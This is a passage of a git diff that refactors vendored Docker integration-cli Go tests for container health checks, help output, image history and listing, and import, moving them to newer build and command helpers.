"touch /test && top") + c.Assert(s.ec.mounts, checker.Equals, 1, check.Commentf(out)) + + out, _ = s.d.Cmd("cp", "test:/test", "/tmp/test") + c.Assert(s.ec.mounts, checker.Equals, 2, check.Commentf(out)) + c.Assert(s.ec.unmounts, checker.Equals, 1, check.Commentf(out)) + + out, _ = s.d.Cmd("kill", "test") + c.Assert(s.ec.unmounts, checker.Equals, 2, check.Commentf(out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go index 6b7baebd00..a06b6c8830 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go @@ -2,32 +2,16 @@ package main import ( "encoding/json" - "strconv" "strings" "time" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" ) -func waitForStatus(c *check.C, name string, prev string, expected string) { - prev = prev + "\n" - expected = expected + "\n" - for { - out, _ := dockerCmd(c, "inspect", "--format={{.State.Status}}", name) - if out == expected { - return - } - c.Check(out, checker.Equals, prev) - if out != prev { - return - } - time.Sleep(100 * time.Millisecond) - } -} - func waitForHealthStatus(c *check.C, name string, prev string, expected string) { prev = prev + "\n" expected = expected + "\n" @@ -55,30 +39,26 @@ func getHealth(c *check.C, name string) *types.Health { func (s *DockerSuite) TestHealth(c *check.C) { testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + existingContainers := ExistingContainerIDs(c) + imageName := "testhealth" - _, err := buildImage(imageName, - `FROM busybox + buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox RUN echo OK > /status CMD ["/bin/sleep", "120"] STOPSIGNAL SIGKILL 
HEALTHCHECK --interval=1s --timeout=30s \ - CMD cat /status`, - true) - - c.Check(err, check.IsNil) + CMD cat /status`)) // No health status before starting name := "test_health" - dockerCmd(c, "create", "--name", name, imageName) - out, _ := dockerCmd(c, "ps", "-a", "--format={{.Status}}") - c.Check(out, checker.Equals, "Created\n") + cid, _ := dockerCmd(c, "create", "--name", name, imageName) + out, _ := dockerCmd(c, "ps", "-a", "--format={{.ID}} {{.Status}}") + out = RemoveOutputForExistingElements(out, existingContainers) + c.Check(out, checker.Equals, cid[:12]+" Created\n") // Inspect the options out, _ = dockerCmd(c, "inspect", - "--format=timeout={{.Config.Healthcheck.Timeout}} "+ - "interval={{.Config.Healthcheck.Interval}} "+ - "retries={{.Config.Healthcheck.Retries}} "+ - "test={{.Config.Healthcheck.Test}}", name) + "--format=timeout={{.Config.Healthcheck.Timeout}} interval={{.Config.Healthcheck.Interval}} retries={{.Config.Healthcheck.Retries}} test={{.Config.Healthcheck.Test}}", name) c.Check(out, checker.Equals, "timeout=30s interval=1s retries=0 test=[CMD-SHELL cat /status]\n") // Start @@ -107,17 +87,15 @@ func (s *DockerSuite) TestHealth(c *check.C) { dockerCmd(c, "rm", "noh") // Disable the check with a new build - _, err = buildImage("no_healthcheck", - `FROM testhealth - HEALTHCHECK NONE`, true) - c.Check(err, check.IsNil) + buildImageSuccessfully(c, "no_healthcheck", build.WithDockerfile(`FROM testhealth + HEALTHCHECK NONE`)) - out, _ = dockerCmd(c, "inspect", "--format={{.ContainerConfig.Healthcheck.Test}}", "no_healthcheck") + out, _ = dockerCmd(c, "inspect", "--format={{.Config.Healthcheck.Test}}", "no_healthcheck") c.Check(out, checker.Equals, "[NONE]\n") // Enable the checks from the CLI _, _ = dockerCmd(c, "run", "-d", "--name=fatal_healthcheck", - "--health-interval=0.5s", + "--health-interval=1s", "--health-retries=3", "--health-cmd=cat /status", "no_healthcheck") @@ -143,27 +121,47 @@ func (s *DockerSuite) TestHealth(c *check.C) { // 
Note: if the interval is too small, it seems that Docker spends all its time running health // checks and never gets around to killing it. _, _ = dockerCmd(c, "run", "-d", "--name=test", - "--health-interval=1s", "--health-cmd=sleep 5m", "--health-timeout=1ms", imageName) + "--health-interval=1s", "--health-cmd=sleep 5m", "--health-timeout=1s", imageName) waitForHealthStatus(c, "test", "starting", "unhealthy") health = getHealth(c, "test") last = health.Log[len(health.Log)-1] c.Check(health.Status, checker.Equals, "unhealthy") c.Check(last.ExitCode, checker.Equals, -1) - c.Check(last.Output, checker.Equals, "Health check exceeded timeout (1ms)") + c.Check(last.Output, checker.Equals, "Health check exceeded timeout (1s)") dockerCmd(c, "rm", "-f", "test") // Check JSON-format - _, err = buildImage(imageName, - `FROM busybox + buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox RUN echo OK > /status CMD ["/bin/sleep", "120"] STOPSIGNAL SIGKILL HEALTHCHECK --interval=1s --timeout=30s \ - CMD ["cat", "/my status"]`, - true) - c.Check(err, check.IsNil) + CMD ["cat", "/my status"]`)) out, _ = dockerCmd(c, "inspect", "--format={{.Config.Healthcheck.Test}}", imageName) c.Check(out, checker.Equals, "[CMD cat /my status]\n") } + +// GitHub #33021 +func (s *DockerSuite) TestUnsetEnvVarHealthCheck(c *check.C) { + testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + + imageName := "testhealth" + buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox +HEALTHCHECK --interval=1s --timeout=5s --retries=5 CMD /bin/sh -c "sleep 1" +ENTRYPOINT /bin/sh -c "sleep 600"`)) + + name := "env_test_health" + // No health status before starting + dockerCmd(c, "run", "-d", "--name", name, "-e", "FOO", imageName) + defer func() { + dockerCmd(c, "rm", "-f", name) + dockerCmd(c, "rmi", imageName) + }() + + // Start + dockerCmd(c, "start", name) + waitForHealthStatus(c, name, "starting", "healthy") + +} diff --git 
a/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go deleted file mode 100644 index 29b6553fc5..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go +++ /dev/null @@ -1,321 +0,0 @@ -package main - -import ( - "fmt" - "os/exec" - "runtime" - "strings" - "unicode" - - "github.com/docker/docker/pkg/homedir" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestHelpTextVerify(c *check.C) { - testRequires(c, DaemonIsLinux) - - // Make sure main help text fits within 80 chars and that - // on non-windows system we use ~ when possible (to shorten things). - // Test for HOME set to its default value and set to "/" on linux - // Yes on windows setting up an array and looping (right now) isn't - // necessary because we just have one value, but we'll need the - // array/loop on linux so we might as well set it up so that we can - // test any number of home dirs later on and all we need to do is - // modify the array - the rest of the testing infrastructure should work - homes := []string{homedir.Get()} - - // Non-Windows machines need to test for this special case of $HOME - if runtime.GOOS != "windows" { - homes = append(homes, "/") - } - - homeKey := homedir.Key() - baseEnvs := appendBaseEnv(true) - - // Remove HOME env var from list so we can add a new value later. - for i, env := range baseEnvs { - if strings.HasPrefix(env, homeKey+"=") { - baseEnvs = append(baseEnvs[:i], baseEnvs[i+1:]...) 
- break - } - } - - for _, home := range homes { - - // Dup baseEnvs and add our new HOME value - newEnvs := make([]string, len(baseEnvs)+1) - copy(newEnvs, baseEnvs) - newEnvs[len(newEnvs)-1] = homeKey + "=" + home - - scanForHome := runtime.GOOS != "windows" && home != "/" - - // Check main help text to make sure its not over 80 chars - helpCmd := exec.Command(dockerBinary, "help") - helpCmd.Env = newEnvs - out, _, err := runCommandWithOutput(helpCmd) - c.Assert(err, checker.IsNil, check.Commentf(out)) - lines := strings.Split(out, "\n") - for _, line := range lines { - // All lines should not end with a space - c.Assert(line, checker.Not(checker.HasSuffix), " ", check.Commentf("Line should not end with a space")) - - if scanForHome && strings.Contains(line, `=`+home) { - c.Fatalf("Line should use '%q' instead of %q:\n%s", homedir.GetShortcutString(), home, line) - } - if runtime.GOOS != "windows" { - i := strings.Index(line, homedir.GetShortcutString()) - if i >= 0 && i != len(line)-1 && line[i+1] != '/' { - c.Fatalf("Main help should not have used home shortcut:\n%s", line) - } - } - } - - // Make sure each cmd's help text fits within 90 chars and that - // on non-windows system we use ~ when possible (to shorten things). 
- // Pull the list of commands from the "Commands:" section of docker help - helpCmd = exec.Command(dockerBinary, "help") - helpCmd.Env = newEnvs - out, _, err = runCommandWithOutput(helpCmd) - c.Assert(err, checker.IsNil, check.Commentf(out)) - i := strings.Index(out, "Commands:") - c.Assert(i, checker.GreaterOrEqualThan, 0, check.Commentf("Missing 'Commands:' in:\n%s", out)) - - cmds := []string{} - // Grab all chars starting at "Commands:" - helpOut := strings.Split(out[i:], "\n") - // Skip first line, it is just "Commands:" - helpOut = helpOut[1:] - - // Create the list of commands we want to test - cmdsToTest := []string{} - for _, cmd := range helpOut { - // Stop on blank line or non-idented line - if cmd == "" || !unicode.IsSpace(rune(cmd[0])) { - break - } - - // Grab just the first word of each line - cmd = strings.Split(strings.TrimSpace(cmd), " ")[0] - cmds = append(cmds, cmd) // Saving count for later - - cmdsToTest = append(cmdsToTest, cmd) - } - - // Add some 'two word' commands - would be nice to automatically - // calculate this list - somehow - cmdsToTest = append(cmdsToTest, "volume create") - cmdsToTest = append(cmdsToTest, "volume inspect") - cmdsToTest = append(cmdsToTest, "volume ls") - cmdsToTest = append(cmdsToTest, "volume rm") - cmdsToTest = append(cmdsToTest, "network connect") - cmdsToTest = append(cmdsToTest, "network create") - cmdsToTest = append(cmdsToTest, "network disconnect") - cmdsToTest = append(cmdsToTest, "network inspect") - cmdsToTest = append(cmdsToTest, "network ls") - cmdsToTest = append(cmdsToTest, "network rm") - - if experimentalDaemon { - cmdsToTest = append(cmdsToTest, "checkpoint create") - cmdsToTest = append(cmdsToTest, "checkpoint ls") - cmdsToTest = append(cmdsToTest, "checkpoint rm") - } - - // Divide the list of commands into go routines and run the func testcommand on the commands in parallel - // to save runtime of test - - errChan := make(chan error) - - for index := 0; index < len(cmdsToTest); index++ { - 
go func(index int) { - errChan <- testCommand(cmdsToTest[index], newEnvs, scanForHome, home) - }(index) - } - - for index := 0; index < len(cmdsToTest); index++ { - err := <-errChan - if err != nil { - c.Fatal(err) - } - } - } -} - -func (s *DockerSuite) TestHelpExitCodesHelpOutput(c *check.C) { - // Test to make sure the exit code and output (stdout vs stderr) of - // various good and bad cases are what we expect - - // docker : stdout=all, stderr=empty, rc=0 - out, _, err := dockerCmdWithError() - c.Assert(err, checker.IsNil, check.Commentf(out)) - // Be really pick - c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker'\n")) - - // docker help: stdout=all, stderr=empty, rc=0 - out, _, err = dockerCmdWithError("help") - c.Assert(err, checker.IsNil, check.Commentf(out)) - // Be really pick - c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker help'\n")) - - // docker --help: stdout=all, stderr=empty, rc=0 - out, _, err = dockerCmdWithError("--help") - c.Assert(err, checker.IsNil, check.Commentf(out)) - // Be really pick - c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker --help'\n")) - - // docker inspect busybox: stdout=all, stderr=empty, rc=0 - // Just making sure stderr is empty on valid cmd - out, _, err = dockerCmdWithError("inspect", "busybox") - c.Assert(err, checker.IsNil, check.Commentf(out)) - // Be really pick - c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker inspect busyBox'\n")) - - // docker rm: stdout=empty, stderr=all, rc!=0 - // testing the min arg error msg - cmd := exec.Command(dockerBinary, "rm") - stdout, stderr, _, err := runCommandWithStdoutStderr(cmd) - c.Assert(err, checker.NotNil) - c.Assert(stdout, checker.Equals, "") - // Should not contain full help text but 
should contain info about - // # of args and Usage line - c.Assert(stderr, checker.Contains, "requires at least 1 argument", check.Commentf("Missing # of args text from 'docker rm'\n")) - - // docker rm NoSuchContainer: stdout=empty, stderr=all, rc=0 - // testing to make sure no blank line on error - cmd = exec.Command(dockerBinary, "rm", "NoSuchContainer") - stdout, stderr, _, err = runCommandWithStdoutStderr(cmd) - c.Assert(err, checker.NotNil) - c.Assert(len(stderr), checker.Not(checker.Equals), 0) - c.Assert(stdout, checker.Equals, "") - // Be really picky - c.Assert(stderr, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker rm'\n")) - - // docker BadCmd: stdout=empty, stderr=all, rc=0 - cmd = exec.Command(dockerBinary, "BadCmd") - stdout, stderr, _, err = runCommandWithStdoutStderr(cmd) - c.Assert(err, checker.NotNil) - c.Assert(stdout, checker.Equals, "") - c.Assert(stderr, checker.Equals, "docker: 'BadCmd' is not a docker command.\nSee 'docker --help'\n", check.Commentf("Unexcepted output for 'docker badCmd'\n")) -} - -func testCommand(cmd string, newEnvs []string, scanForHome bool, home string) error { - - args := strings.Split(cmd+" --help", " ") - - // Check the full usage text - helpCmd := exec.Command(dockerBinary, args...) - helpCmd.Env = newEnvs - out, stderr, _, err := runCommandWithStdoutStderr(helpCmd) - if len(stderr) != 0 { - return fmt.Errorf("Error on %q help. non-empty stderr:%q\n", cmd, stderr) - } - if strings.HasSuffix(out, "\n\n") { - return fmt.Errorf("Should not have blank line on %q\n", cmd) - } - if !strings.Contains(out, "--help") { - return fmt.Errorf("All commands should mention '--help'. 
Command '%v' did not.\n", cmd) - } - - if err != nil { - return fmt.Errorf(out) - } - - // Check each line for lots of stuff - lines := strings.Split(out, "\n") - for _, line := range lines { - i := strings.Index(line, "~") - if i >= 0 && i != len(line)-1 && line[i+1] != '/' { - return fmt.Errorf("Help for %q should not have used ~:\n%s", cmd, line) - } - - // If a line starts with 4 spaces then assume someone - // added a multi-line description for an option and we need - // to flag it - if strings.HasPrefix(line, " ") && - !strings.HasPrefix(strings.TrimLeft(line, " "), "--") { - return fmt.Errorf("Help for %q should not have a multi-line option", cmd) - } - - // Options should NOT end with a period - if strings.HasPrefix(line, " -") && strings.HasSuffix(line, ".") { - return fmt.Errorf("Help for %q should not end with a period: %s", cmd, line) - } - - // Options should NOT end with a space - if strings.HasSuffix(line, " ") { - return fmt.Errorf("Help for %q should not end with a space: %s", cmd, line) - } - - } - - // For each command make sure we generate an error - // if we give a bad arg - args = strings.Split(cmd+" --badArg", " ") - - out, _, err = dockerCmdWithError(args...) - if err == nil { - return fmt.Errorf(out) - } - - // Be really picky - if strings.HasSuffix(stderr, "\n\n") { - return fmt.Errorf("Should not have a blank line at the end of 'docker rm'\n") - } - - // Now make sure that each command will print a short-usage - // (not a full usage - meaning no opts section) if we - // are missing a required arg or pass in a bad arg - - // These commands will never print a short-usage so don't test - noShortUsage := map[string]string{ - "images": "", - "login": "", - "logout": "", - "network": "", - "stats": "", - "volume create": "", - } - - if _, ok := noShortUsage[cmd]; !ok { - // skipNoArgs are ones that we don't want to try w/o - // any args. Either because it'll hang the test or - // lead to incorrect test result (like false negative). 
- // Whatever the reason, skip trying to run w/o args and - // jump to trying with a bogus arg. - skipNoArgs := map[string]struct{}{ - "daemon": {}, - "events": {}, - "load": {}, - } - - var result *icmd.Result - if _, ok := skipNoArgs[cmd]; !ok { - result = dockerCmdWithResult(strings.Split(cmd, " ")...) - } - - // If its ok w/o any args then try again with an arg - if result == nil || result.ExitCode == 0 { - result = dockerCmdWithResult(strings.Split(cmd+" badArg", " ")...) - } - - if err := result.Compare(icmd.Expected{ - Out: icmd.None, - Err: "\nUsage:", - ExitCode: 1, - }); err != nil { - return err - } - - stderr := result.Stderr() - // Shouldn't have full usage - if strings.Contains(stderr, "--help=false") { - return fmt.Errorf("Should not have full usage on %q:%v", result.Cmd.Args, stderr) - } - if strings.HasSuffix(stderr, "\n\n") { - return fmt.Errorf("Should not have a blank line on %q\n%v", result.Cmd.Args, stderr) - } - } - - return nil -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go index 9979080b1c..43c4b94334 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go @@ -6,7 +6,8 @@ import ( "strconv" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" ) @@ -14,7 +15,7 @@ import ( // sort is not predictable it doesn't always fail. 
func (s *DockerSuite) TestBuildHistory(c *check.C) { name := "testbuildhistory" - _, err := buildImage(name, `FROM `+minimalBaseImage()+` + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` LABEL label.A="A" LABEL label.B="B" LABEL label.C="C" @@ -40,12 +41,9 @@ LABEL label.V="V" LABEL label.W="W" LABEL label.X="X" LABEL label.Y="Y" -LABEL label.Z="Z"`, - true) +LABEL label.Z="Z"`)) - c.Assert(err, checker.IsNil) - - out, _ := dockerCmd(c, "history", "testbuildhistory") + out, _ := dockerCmd(c, "history", name) actualValues := strings.Split(out, "\n")[1:27] expectedValues := [26]string{"Z", "Y", "X", "W", "V", "U", "T", "S", "R", "Q", "P", "O", "N", "M", "L", "K", "J", "I", "H", "G", "F", "E", "D", "C", "B", "A"} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go index 3b678a2586..0dd319fbc9 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go @@ -10,9 +10,11 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/docker/docker/pkg/stringid" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestImagesEnsureImageIsListed(c *check.C) { @@ -45,20 +47,17 @@ func (s *DockerSuite) TestImagesEnsureImageWithBadTagIsNotListed(c *check.C) { } func (s *DockerSuite) TestImagesOrderedByCreationDate(c *check.C) { - id1, err := buildImage("order:test_a", - `FROM busybox - MAINTAINER dockerio1`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "order:test_a", build.WithDockerfile(`FROM busybox + MAINTAINER dockerio1`)) + id1 := getIDByName(c, "order:test_a") time.Sleep(1 * time.Second) - id2, err := buildImage("order:test_c", - `FROM busybox - 
MAINTAINER dockerio2`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "order:test_c", build.WithDockerfile(`FROM busybox + MAINTAINER dockerio2`)) + id2 := getIDByName(c, "order:test_c") time.Sleep(1 * time.Second) - id3, err := buildImage("order:test_b", - `FROM busybox - MAINTAINER dockerio3`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "order:test_b", build.WithDockerfile(`FROM busybox + MAINTAINER dockerio3`)) + id3 := getIDByName(c, "order:test_b") out, _ := dockerCmd(c, "images", "-q", "--no-trunc") imgs := strings.Split(out, "\n") @@ -77,20 +76,17 @@ func (s *DockerSuite) TestImagesFilterLabelMatch(c *check.C) { imageName1 := "images_filter_test1" imageName2 := "images_filter_test2" imageName3 := "images_filter_test3" - image1ID, err := buildImage(imageName1, - `FROM busybox - LABEL match me`, true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, imageName1, build.WithDockerfile(`FROM busybox + LABEL match me`)) + image1ID := getIDByName(c, imageName1) - image2ID, err := buildImage(imageName2, - `FROM busybox - LABEL match="me too"`, true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, imageName2, build.WithDockerfile(`FROM busybox + LABEL match="me too"`)) + image2ID := getIDByName(c, imageName2) - image3ID, err := buildImage(imageName3, - `FROM busybox - LABEL nomatch me`, true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, imageName3, build.WithDockerfile(`FROM busybox + LABEL nomatch me`)) + image3ID := getIDByName(c, imageName3) out, _ := dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=match") out = strings.TrimSpace(out) @@ -104,7 +100,7 @@ func (s *DockerSuite) TestImagesFilterLabelMatch(c *check.C) { } // Regression : #15659 -func (s *DockerSuite) TestImagesFilterLabelWithCommit(c *check.C) { +func (s *DockerSuite) TestCommitWithFilterLabel(c *check.C) { // Create a container dockerCmd(c, "run", "--name", "bar", "busybox", "/bin/sh") // Commit with labels "using changes" @@ 
-117,15 +113,15 @@ func (s *DockerSuite) TestImagesFilterLabelWithCommit(c *check.C) { } func (s *DockerSuite) TestImagesFilterSinceAndBefore(c *check.C) { - imageID1, err := buildImage("image:1", `FROM `+minimalBaseImage()+` -LABEL number=1`, true) - c.Assert(err, checker.IsNil) - imageID2, err := buildImage("image:2", `FROM `+minimalBaseImage()+` -LABEL number=2`, true) - c.Assert(err, checker.IsNil) - imageID3, err := buildImage("image:3", `FROM `+minimalBaseImage()+` -LABEL number=3`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "image:1", build.WithDockerfile(`FROM `+minimalBaseImage()+` +LABEL number=1`)) + imageID1 := getIDByName(c, "image:1") + buildImageSuccessfully(c, "image:2", build.WithDockerfile(`FROM `+minimalBaseImage()+` +LABEL number=2`)) + imageID2 := getIDByName(c, "image:2") + buildImageSuccessfully(c, "image:3", build.WithDockerfile(`FROM `+minimalBaseImage()+` +LABEL number=3`)) + imageID3 := getIDByName(c, "image:3") expected := []string{imageID3, imageID2} @@ -185,13 +181,16 @@ func assertImageList(out string, expected []string) bool { return true } +// FIXME(vdemeester) should be a unit test on `docker image ls` func (s *DockerSuite) TestImagesFilterSpaceTrimCase(c *check.C) { imageName := "images_filter_test" - buildImage(imageName, - `FROM busybox + // Build a image and fail to build so that we have dangling images ? 
+ buildImage(imageName, build.WithDockerfile(`FROM busybox RUN touch /test/foo RUN touch /test/bar - RUN touch /test/baz`, true) + RUN touch /test/baz`)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) filters := []string{ "dangling=true", @@ -250,6 +249,7 @@ func (s *DockerSuite) TestImagesEnsureDanglingImageOnlyListedOnce(c *check.C) { } +// FIXME(vdemeester) should be a unit test for `docker image ls` func (s *DockerSuite) TestImagesWithIncorrectFilter(c *check.C) { out, _, err := dockerCmdWithError("images", "-f", "dangling=invalid") c.Assert(err, check.NotNil) @@ -261,32 +261,33 @@ func (s *DockerSuite) TestImagesEnsureOnlyHeadsImagesShown(c *check.C) { FROM busybox MAINTAINER docker ENV foo bar` - - head, out, err := buildImageWithOut("scratch-image", dockerfile, false) - c.Assert(err, check.IsNil) + name := "scratch-image" + result := buildImage(name, build.WithDockerfile(dockerfile)) + result.Assert(c, icmd.Success) + id := getIDByName(c, name) // this is just the output of docker build // we're interested in getting the image id of the MAINTAINER instruction // and that's located at output, line 5, from 7 to end - split := strings.Split(out, "\n") + split := strings.Split(result.Combined(), "\n") intermediate := strings.TrimSpace(split[5][7:]) - out, _ = dockerCmd(c, "images") + out, _ := dockerCmd(c, "images") // images shouldn't show non-heads images c.Assert(out, checker.Not(checker.Contains), intermediate) // images should contain final built images - c.Assert(out, checker.Contains, stringid.TruncateID(head)) + c.Assert(out, checker.Contains, stringid.TruncateID(id)) } func (s *DockerSuite) TestImagesEnsureImagesFromScratchShown(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support FROM scratch - dockerfile := ` FROM scratch MAINTAINER docker` - id, _, err := buildImageWithOut("scratch-image", dockerfile, false) - c.Assert(err, check.IsNil) + name := "scratch-image" + buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile)) + 
id := getIDByName(c, name) out, _ := dockerCmd(c, "images") // images should contain images built from scratch @@ -299,9 +300,10 @@ func (s *DockerSuite) TestImagesEnsureImagesFromBusyboxShown(c *check.C) { dockerfile := ` FROM busybox MAINTAINER docker` + name := "busybox-image" - id, _, err := buildImageWithOut("busybox-image", dockerfile, false) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile)) + id := getIDByName(c, name) out, _ := dockerCmd(c, "images") // images should contain images built from busybox @@ -334,7 +336,7 @@ func (s *DockerSuite) TestImagesFormat(c *check.C) { expected := []string{"myimage", "myimage"} var names []string names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) + c.Assert(names, checker.DeepEquals, expected, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) } // ImagesDefaultFormatAndQuiet diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go index 57dc2a6698..9f8e915803 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go @@ -9,9 +9,10 @@ import ( "regexp" "strings" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestImportDisplay(c *check.C) { @@ -19,7 +20,7 @@ func (s *DockerSuite) TestImportDisplay(c *check.C) { out, _ := dockerCmd(c, "run", "-d", "busybox", "true") cleanedContainerID := strings.TrimSpace(out) - out, _, err := runCommandPipelineWithOutput( + out, err := 
RunCommandPipelineWithOutput( exec.Command(dockerBinary, "export", cleanedContainerID), exec.Command(dockerBinary, "import", "-"), ) @@ -51,11 +52,10 @@ func (s *DockerSuite) TestImportFile(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) defer os.Remove(temporaryFile.Name()) - runCmd := exec.Command(dockerBinary, "export", "test-import") - runCmd.Stdout = bufio.NewWriter(temporaryFile) - - _, err = runCommand(runCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "export", "test-import"}, + Stdout: bufio.NewWriter(temporaryFile), + }).Assert(c, icmd.Success) out, _ := dockerCmd(c, "import", temporaryFile.Name()) c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) @@ -73,14 +73,12 @@ func (s *DockerSuite) TestImportGzipped(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) defer os.Remove(temporaryFile.Name()) - runCmd := exec.Command(dockerBinary, "export", "test-import") w := gzip.NewWriter(temporaryFile) - runCmd.Stdout = w - - _, err = runCommand(runCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) - err = w.Close() - c.Assert(err, checker.IsNil, check.Commentf("failed to close gzip writer")) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "export", "test-import"}, + Stdout: w, + }).Assert(c, icmd.Success) + c.Assert(w.Close(), checker.IsNil, check.Commentf("failed to close gzip writer")) temporaryFile.Close() out, _ := dockerCmd(c, "import", temporaryFile.Name()) c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) @@ -98,11 +96,10 @@ func (s *DockerSuite) TestImportFileWithMessage(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) defer os.Remove(temporaryFile.Name()) - runCmd := exec.Command(dockerBinary, 
"export", "test-import") - runCmd.Stdout = bufio.NewWriter(temporaryFile) - - _, err = runCommand(runCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "export", "test-import"}, + Stdout: bufio.NewWriter(temporaryFile), + }).Assert(c, icmd.Success) message := "Testing commit message" out, _ := dockerCmd(c, "import", "-m", message, temporaryFile.Name()) @@ -129,22 +126,17 @@ func (s *DockerSuite) TestImportFileNonExistentFile(c *check.C) { func (s *DockerSuite) TestImportWithQuotedChanges(c *check.C) { testRequires(c, DaemonIsLinux) - dockerCmd(c, "run", "--name", "test-import", "busybox", "true") + cli.DockerCmd(c, "run", "--name", "test-import", "busybox", "true") temporaryFile, err := ioutil.TempFile("", "exportImportTest") c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) defer os.Remove(temporaryFile.Name()) - result := icmd.RunCmd(icmd.Cmd{ - Command: binaryWithArgs("export", "test-import"), - Stdout: bufio.NewWriter(temporaryFile), - }) - c.Assert(result, icmd.Matches, icmd.Success) + cli.Docker(cli.Args("export", "test-import"), cli.WithStdout(bufio.NewWriter(temporaryFile))).Assert(c, icmd.Success) - result = dockerCmdWithResult("import", "-c", `ENTRYPOINT ["/bin/sh", "-c"]`, temporaryFile.Name()) - c.Assert(result, icmd.Matches, icmd.Success) + result := cli.DockerCmd(c, "import", "-c", `ENTRYPOINT ["/bin/sh", "-c"]`, temporaryFile.Name()) image := strings.TrimSpace(result.Stdout()) - result = dockerCmdWithResult("run", "--rm", image, "true") - c.Assert(result, icmd.Matches, icmd.Expected{Out: icmd.None}) + result = cli.DockerCmd(c, "run", "--rm", image, "true") + result.Assert(c, icmd.Expected{Out: icmd.None}) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go index 62ce7e22f2..65091029ee 100644 --- 
